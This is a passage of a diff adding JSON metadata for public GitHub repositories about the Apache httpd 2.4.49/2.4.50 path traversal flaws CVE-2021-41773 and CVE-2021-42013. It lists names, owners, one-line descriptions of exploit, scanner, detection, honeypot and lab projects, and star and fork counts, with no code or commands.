+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "cve-2021-41773",
+ "path-traversal",
+ "shodan",
+ "shodan-cli",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414592683,
+ "name": "CVE-2021-41773",
+ "full_name": "noflowpls\/CVE-2021-41773",
+ "owner": {
+ "login": "noflowpls",
+ "id": 84136529,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84136529?v=4",
+ "html_url": "https:\/\/github.com\/noflowpls"
+ },
+ "html_url": "https:\/\/github.com\/noflowpls\/CVE-2021-41773",
+ "description": "CVE-2021-41773",
+ "fork": false,
+ "created_at": "2021-10-07T12:30:13Z",
+ "updated_at": "2024-04-26T10:18:22Z",
+ "pushed_at": "2022-11-15T08:51:33Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414639113,
+ "name": "CVE-2021-41773",
+ "full_name": "McSl0vv\/CVE-2021-41773",
+ "owner": {
+ "login": "McSl0vv",
+ "id": 36660195,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36660195?v=4",
+ "html_url": "https:\/\/github.com\/McSl0vv"
+ },
+ "html_url": "https:\/\/github.com\/McSl0vv\/CVE-2021-41773",
+ "description": "Apache 2.4.49 Exploit",
+ "fork": false,
+ "created_at": "2021-10-07T14:41:05Z",
+ "updated_at": "2021-10-07T14:46:05Z",
+ "pushed_at": "2021-10-07T14:46:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414646379,
+ "name": "CVE-2021-41773",
+ "full_name": "shiomiyan\/CVE-2021-41773",
+ "owner": {
+ "login": "shiomiyan",
+ "id": 35842766,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35842766?v=4",
+ "html_url": "https:\/\/github.com\/shiomiyan"
+ },
+ "html_url": "https:\/\/github.com\/shiomiyan\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-07T15:00:55Z",
+ "updated_at": "2021-10-15T19:28:33Z",
+ "pushed_at": "2021-10-15T19:28:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414650983,
+ "name": "mass_cve-2021-41773",
+ "full_name": "justakazh\/mass_cve-2021-41773",
+ "owner": {
+ "login": "justakazh",
+ "id": 36891477,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36891477?v=4",
+ "html_url": "https:\/\/github.com\/justakazh"
+ },
+ "html_url": "https:\/\/github.com\/justakazh\/mass_cve-2021-41773",
+ "description": "MASS CVE-2021-41773",
+ "fork": false,
+ "created_at": "2021-10-07T15:13:18Z",
+ "updated_at": "2024-01-10T12:07:21Z",
+ "pushed_at": "2023-11-14T07:00:33Z",
+ "stargazers_count": 28,
+ "watchers_count": 28,
+ "has_discussions": false,
+ "forks_count": 24,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "automatic",
+ "cve-2021-41773",
+ "exploit",
+ "scanner"
+ ],
+ "visibility": "public",
+ "forks": 24,
+ "watchers": 28,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 414764740,
+ "name": "CVE-2021-41773",
+ "full_name": "Sakura-nee\/CVE-2021-41773",
+ "owner": {
+ "login": "Sakura-nee",
+ "id": 74785477,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74785477?v=4",
+ "html_url": "https:\/\/github.com\/Sakura-nee"
+ },
+ "html_url": "https:\/\/github.com\/Sakura-nee\/CVE-2021-41773",
+ "description": "Mass exploitation CVE-2021-41773 and auto detect possible RCE",
+ "fork": false,
+ "created_at": "2021-10-07T21:37:50Z",
+ "updated_at": "2023-09-28T11:32:09Z",
+ "pushed_at": "2021-10-07T21:52:57Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414804962,
+ "name": "CVE-2021-41773",
+ "full_name": "shellreaper\/CVE-2021-41773",
+ "owner": {
+ "login": "shellreaper",
+ "id": 76930483,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76930483?v=4",
+ "html_url": "https:\/\/github.com\/shellreaper"
+ },
+ "html_url": "https:\/\/github.com\/shellreaper\/CVE-2021-41773",
+ "description": "This is a simple POC for Apache\/2.4.49 Path Traversal Vulnerability",
+ "fork": false,
+ "created_at": "2021-10-08T01:13:33Z",
+ "updated_at": "2023-09-28T11:32:09Z",
+ "pushed_at": "2021-11-12T00:03:34Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414845157,
+ "name": "CVE-2021-41773",
+ "full_name": "0xRar\/CVE-2021-41773",
+ "owner": {
+ "login": "0xRar",
+ "id": 33517160,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33517160?v=4",
+ "html_url": "https:\/\/github.com\/0xRar"
+ },
+ "html_url": "https:\/\/github.com\/0xRar\/CVE-2021-41773",
+ "description": "Exploit for Apache 2.4.49",
+ "fork": false,
+ "created_at": "2021-10-08T04:26:31Z",
+ "updated_at": "2023-09-28T11:32:09Z",
+ "pushed_at": "2021-10-08T05:54:25Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414848372,
+ "name": "Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt",
+ "full_name": "pisut4152\/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt",
+ "owner": {
+ "login": "pisut4152",
+ "id": 72641661,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72641661?v=4",
+ "html_url": "https:\/\/github.com\/pisut4152"
+ },
+ "html_url": "https:\/\/github.com\/pisut4152\/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-08T04:43:27Z",
+ "updated_at": "2023-09-28T11:32:09Z",
+ "pushed_at": "2021-10-08T04:46:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414878778,
+ "name": "CVE-2021-41773",
+ "full_name": "corelight\/CVE-2021-41773",
+ "owner": {
+ "login": "corelight",
+ "id": 21672558,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4",
+ "html_url": "https:\/\/github.com\/corelight"
+ },
+ "html_url": "https:\/\/github.com\/corelight\/CVE-2021-41773",
+ "description": "A Zeek package which raises notices for Path Traversal\/RCE in Apache HTTP Server 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013)",
+ "fork": false,
+ "created_at": "2021-10-08T06:54:27Z",
+ "updated_at": "2021-10-28T05:48:41Z",
+ "pushed_at": "2021-10-28T05:55:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 414887591,
+ "name": "CVE-2021-41773",
+ "full_name": "zeronine9\/CVE-2021-41773",
+ "owner": {
+ "login": "zeronine9",
+ "id": 60152515,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60152515?v=4",
+ "html_url": "https:\/\/github.com\/zeronine9"
+ },
+ "html_url": "https:\/\/github.com\/zeronine9\/CVE-2021-41773",
+ "description": "Fast python tool to test apache path traversal CVE-2021-41773 in a List of url ",
+ "fork": false,
+ "created_at": "2021-10-08T07:24:49Z",
+ "updated_at": "2023-09-28T11:32:10Z",
+ "pushed_at": "2021-10-08T07:27:04Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414907601,
+ "name": "CVE-2021-41773",
+ "full_name": "b1tsec\/CVE-2021-41773",
+ "owner": {
+ "login": "b1tsec",
+ "id": 74562513,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74562513?v=4",
+ "html_url": "https:\/\/github.com\/b1tsec"
+ },
+ "html_url": "https:\/\/github.com\/b1tsec\/CVE-2021-41773",
+ "description": "A Python script to check if an Apache web server is vulnerable to CVE-2021-41773",
+ "fork": false,
+ "created_at": "2021-10-08T08:32:51Z",
+ "updated_at": "2023-09-28T11:32:10Z",
+ "pushed_at": "2021-10-08T12:15:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 415041820,
+ "name": "CVE-2021-41773",
+ "full_name": "superzerosec\/CVE-2021-41773",
+ "owner": {
+ "login": "superzerosec",
+ "id": 57648217,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57648217?v=4",
+ "html_url": "https:\/\/github.com\/superzerosec"
+ },
+ "html_url": "https:\/\/github.com\/superzerosec\/CVE-2021-41773",
+ "description": "POC",
+ "fork": false,
+ "created_at": "2021-10-08T15:40:41Z",
+ "updated_at": "2023-09-28T11:32:10Z",
+ "pushed_at": "2021-10-11T22:24:12Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 415177333,
+ "name": "apachrot",
+ "full_name": "im-hanzou\/apachrot",
+ "owner": {
+ "login": "im-hanzou",
+ "id": 61415393,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4",
+ "html_url": "https:\/\/github.com\/im-hanzou"
+ },
+ "html_url": "https:\/\/github.com\/im-hanzou\/apachrot",
+ "description": "Apache (Linux) CVE-2021-41773\/2021-42013 Mass Vulnerability Checker",
+ "fork": false,
+ "created_at": "2021-10-09T02:12:39Z",
+ "updated_at": "2024-04-24T17:28:31Z",
+ "pushed_at": "2021-10-12T07:27:09Z",
+ "stargazers_count": 22,
+ "watchers_count": 22,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "checker",
+ "cve-2021-41773",
+ "cve-2021-42013",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 22,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 415191949,
+ "name": "CVE-2021-41773_CVE-2021-42013",
+ "full_name": "inbug-team\/CVE-2021-41773_CVE-2021-42013",
+ "owner": {
+ "login": "inbug-team",
+ "id": 81735769,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81735769?v=4",
+ "html_url": "https:\/\/github.com\/inbug-team"
+ },
+ "html_url": "https:\/\/github.com\/inbug-team\/CVE-2021-41773_CVE-2021-42013",
+ "description": "CVE-2021-41773 CVE-2021-42013漏洞批量检测工具",
+ "fork": false,
+ "created_at": "2021-10-09T03:32:18Z",
+ "updated_at": "2024-06-21T14:28:54Z",
+ "pushed_at": "2021-10-09T03:49:21Z",
+ "stargazers_count": 149,
+ "watchers_count": 149,
+ "has_discussions": false,
+ "forks_count": 51,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 51,
+ "watchers": 149,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 415290894,
+ "name": "cve-2021-41773-and-cve-2021-42013",
+ "full_name": "5gstudent\/cve-2021-41773-and-cve-2021-42013",
+ "owner": {
+ "login": "5gstudent",
+ "id": 37172754,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37172754?v=4",
+ "html_url": "https:\/\/github.com\/5gstudent"
+ },
+ "html_url": "https:\/\/github.com\/5gstudent\/cve-2021-41773-and-cve-2021-42013",
+ "description": "cve-2021-41773 即 cve-2021-42013 批量检测脚本",
+ "fork": false,
+ "created_at": "2021-10-09T11:33:56Z",
+ "updated_at": "2023-09-28T11:32:12Z",
+ "pushed_at": "2021-10-09T12:14:29Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 415357102,
+ "name": "CVE-2021-41773",
+ "full_name": "EagleTube\/CVE-2021-41773",
+ "owner": {
+ "login": "EagleTube",
+ "id": 87413459,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87413459?v=4",
+ "html_url": "https:\/\/github.com\/EagleTube"
+ },
+ "html_url": "https:\/\/github.com\/EagleTube\/CVE-2021-41773",
+ "description": "Apache 2.4.49 Path Traversal Vulnerability Checker ",
+ "fork": false,
+ "created_at": "2021-10-09T16:07:57Z",
+ "updated_at": "2023-09-28T11:32:13Z",
+ "pushed_at": "2021-10-09T16:32:08Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 415669889,
+ "name": "CVE-2021-41773-42013",
+ "full_name": "5l1v3r1\/CVE-2021-41773-42013",
+ "owner": {
+ "login": "5l1v3r1",
+ "id": 34143537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34143537?v=4",
+ "html_url": "https:\/\/github.com\/5l1v3r1"
+ },
+ "html_url": "https:\/\/github.com\/5l1v3r1\/CVE-2021-41773-42013",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-10T18:36:54Z",
+ "updated_at": "2021-10-10T18:36:55Z",
+ "pushed_at": "2021-10-10T10:20:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 415737041,
+ "name": "Apachuk",
+ "full_name": "apapedulimu\/Apachuk",
+ "owner": {
+ "login": "apapedulimu",
+ "id": 16370264,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16370264?v=4",
+ "html_url": "https:\/\/github.com\/apapedulimu"
+ },
+ "html_url": "https:\/\/github.com\/apapedulimu\/Apachuk",
+ "description": "CVE-2021-41773 Grabber",
+ "fork": false,
+ "created_at": "2021-10-11T00:57:27Z",
+ "updated_at": "2023-09-28T11:32:15Z",
+ "pushed_at": "2021-10-11T02:51:11Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 415761005,
+ "name": "CVE-2021-41773",
+ "full_name": "scarmandef\/CVE-2021-41773",
+ "owner": {
+ "login": "scarmandef",
+ "id": 80011252,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80011252?v=4",
+ "html_url": "https:\/\/github.com\/scarmandef"
+ },
+ "html_url": "https:\/\/github.com\/scarmandef\/CVE-2021-41773",
+ "description": " Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE",
+ "fork": false,
+ "created_at": "2021-10-11T03:03:08Z",
+ "updated_at": "2021-10-14T04:59:46Z",
+ "pushed_at": "2021-10-14T04:59:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 416511119,
+ "name": "httpd-2.4.49",
+ "full_name": "ksanchezcld\/httpd-2.4.49",
+ "owner": {
+ "login": "ksanchezcld",
+ "id": 3130599,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3130599?v=4",
+ "html_url": "https:\/\/github.com\/ksanchezcld"
+ },
+ "html_url": "https:\/\/github.com\/ksanchezcld\/httpd-2.4.49",
+ "description": "critical: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)",
+ "fork": false,
+ "created_at": "2021-10-12T22:02:09Z",
+ "updated_at": "2023-04-29T16:26:04Z",
+ "pushed_at": "2021-10-12T22:02:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 416830075,
+ "name": "SimplesApachePathTraversal",
+ "full_name": "MrCl0wnLab\/SimplesApachePathTraversal",
+ "owner": {
+ "login": "MrCl0wnLab",
+ "id": 17049332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17049332?v=4",
+ "html_url": "https:\/\/github.com\/MrCl0wnLab"
+ },
+ "html_url": "https:\/\/github.com\/MrCl0wnLab\/SimplesApachePathTraversal",
+ "description": "Tool check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519",
+ "fork": false,
+ "created_at": "2021-10-13T17:03:56Z",
+ "updated_at": "2024-01-30T14:01:15Z",
+ "pushed_at": "2021-10-14T21:11:44Z",
+ "stargazers_count": 60,
+ "watchers_count": 60,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-17519",
+ "cve-2021-41773",
+ "cve-2021-42013"
+ ],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 60,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 417461813,
+ "name": "apache-httpd-path-traversal-checker",
+ "full_name": "theLSA\/apache-httpd-path-traversal-checker",
+ "owner": {
+ "login": "theLSA",
+ "id": 28248956,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28248956?v=4",
+ "html_url": "https:\/\/github.com\/theLSA"
+ },
+ "html_url": "https:\/\/github.com\/theLSA\/apache-httpd-path-traversal-checker",
+ "description": "apache httpd path traversal checker(CVE-2021-41773 \/ CVE-2021-42013)",
+ "fork": false,
+ "created_at": "2021-10-15T10:38:44Z",
+ "updated_at": "2023-03-19T15:06:52Z",
+ "pushed_at": "2021-10-16T10:28:23Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 417643516,
+ "name": "CVE-2021-41773",
+ "full_name": "LudovicPatho\/CVE-2021-41773",
+ "owner": {
+ "login": "LudovicPatho",
+ "id": 26960886,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26960886?v=4",
+ "html_url": "https:\/\/github.com\/LudovicPatho"
+ },
+ "html_url": "https:\/\/github.com\/LudovicPatho\/CVE-2021-41773",
+ "description": "The first vulnerability with the CVE identifier CVE-2021-41773 is a path traversal flaw that exists in Apache HTTP Server 2.4.49.",
+ "fork": false,
+ "created_at": "2021-10-15T21:38:48Z",
+ "updated_at": "2023-12-13T10:08:43Z",
+ "pushed_at": "2022-10-26T18:01:44Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 417869261,
+ "name": "CVE-2021-41773_Honeypot",
+ "full_name": "lopqto\/CVE-2021-41773_Honeypot",
+ "owner": {
+ "login": "lopqto",
+ "id": 30213943,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30213943?v=4",
+ "html_url": "https:\/\/github.com\/lopqto"
+ },
+ "html_url": "https:\/\/github.com\/lopqto\/CVE-2021-41773_Honeypot",
+ "description": "Simple honeypot for CVE-2021-41773 vulnerability",
+ "fork": false,
+ "created_at": "2021-10-16T15:30:34Z",
+ "updated_at": "2024-03-02T10:06:40Z",
+ "pushed_at": "2021-10-17T08:13:08Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 418481558,
+ "name": "CVE-2021-41773_42013",
+ "full_name": "zerodaywolf\/CVE-2021-41773_42013",
+ "owner": {
+ "login": "zerodaywolf",
+ "id": 37404408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37404408?v=4",
+ "html_url": "https:\/\/github.com\/zerodaywolf"
+ },
+ "html_url": "https:\/\/github.com\/zerodaywolf\/CVE-2021-41773_42013",
+ "description": "Lab setup for CVE-2021-41773 (Apache httpd 2.4.49) and CVE-2021-42013 (Apache httpd 2.4.50).",
+ "fork": false,
+ "created_at": "2021-10-18T12:01:58Z",
+ "updated_at": "2021-12-10T06:09:44Z",
+ "pushed_at": "2021-10-18T12:47:56Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "cve",
+ "cve-2021-41773",
+ "cve-2021-42013",
+ "httpd",
+ "lfi",
+ "penetration-testing",
+ "rce",
+ "security",
+ "vulnerable",
+ "web"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 419369252,
+ "name": "CVE-2021-41773",
+ "full_name": "LayarKacaSiber\/CVE-2021-41773",
+ "owner": {
+ "login": "LayarKacaSiber",
+ "id": 92864439,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92864439?v=4",
+ "html_url": "https:\/\/github.com\/LayarKacaSiber"
+ },
+ "html_url": "https:\/\/github.com\/LayarKacaSiber\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-20T14:41:15Z",
+ "updated_at": "2021-10-23T13:15:51Z",
+ "pushed_at": "2021-10-23T13:15:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 420144635,
+ "name": "CVE-2021-41773",
+ "full_name": "BabyTeam1024\/CVE-2021-41773",
+ "owner": {
+ "login": "BabyTeam1024",
+ "id": 74447452,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74447452?v=4",
+ "html_url": "https:\/\/github.com\/BabyTeam1024"
+ },
+ "html_url": "https:\/\/github.com\/BabyTeam1024\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-22T15:12:12Z",
+ "updated_at": "2023-09-28T11:32:33Z",
+ "pushed_at": "2021-10-22T15:23:56Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 420407065,
+ "name": "cve-2021-41773",
+ "full_name": "walnutsecurity\/cve-2021-41773",
+ "owner": {
+ "login": "walnutsecurity",
+ "id": 92915142,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92915142?v=4",
+ "html_url": "https:\/\/github.com\/walnutsecurity"
+ },
+ "html_url": "https:\/\/github.com\/walnutsecurity\/cve-2021-41773",
+ "description": "cve-2021-41773.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.49",
+ "fork": false,
+ "created_at": "2021-10-23T12:31:53Z",
+ "updated_at": "2024-01-06T15:57:28Z",
+ "pushed_at": "2023-01-11T14:04:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 420528447,
+ "name": "CVE-2021-41773",
+ "full_name": "TheLastVvV\/CVE-2021-41773",
+ "owner": {
+ "login": "TheLastVvV",
+ "id": 71128830,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71128830?v=4",
+ "html_url": "https:\/\/github.com\/TheLastVvV"
+ },
+ "html_url": "https:\/\/github.com\/TheLastVvV\/CVE-2021-41773",
+ "description": "Poc CVE-2021-41773 - Apache 2.4.49 with CGI enabled",
+ "fork": false,
+ "created_at": "2021-10-23T21:37:25Z",
+ "updated_at": "2021-10-23T23:15:50Z",
+ "pushed_at": "2021-10-23T21:50:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 421138366,
+ "name": "CVE-2021-41773",
+ "full_name": "MazX0p\/CVE-2021-41773",
+ "owner": {
+ "login": "MazX0p",
+ "id": 54814433,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54814433?v=4",
+ "html_url": "https:\/\/github.com\/MazX0p"
+ },
+ "html_url": "https:\/\/github.com\/MazX0p\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-25T18:21:43Z",
+ "updated_at": "2022-07-01T21:33:34Z",
+ "pushed_at": "2021-10-25T18:39:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 421191229,
+ "name": "Scanner-CVE-2021-41773",
+ "full_name": "vida003\/Scanner-CVE-2021-41773",
+ "owner": {
+ "login": "vida003",
+ "id": 77762068,
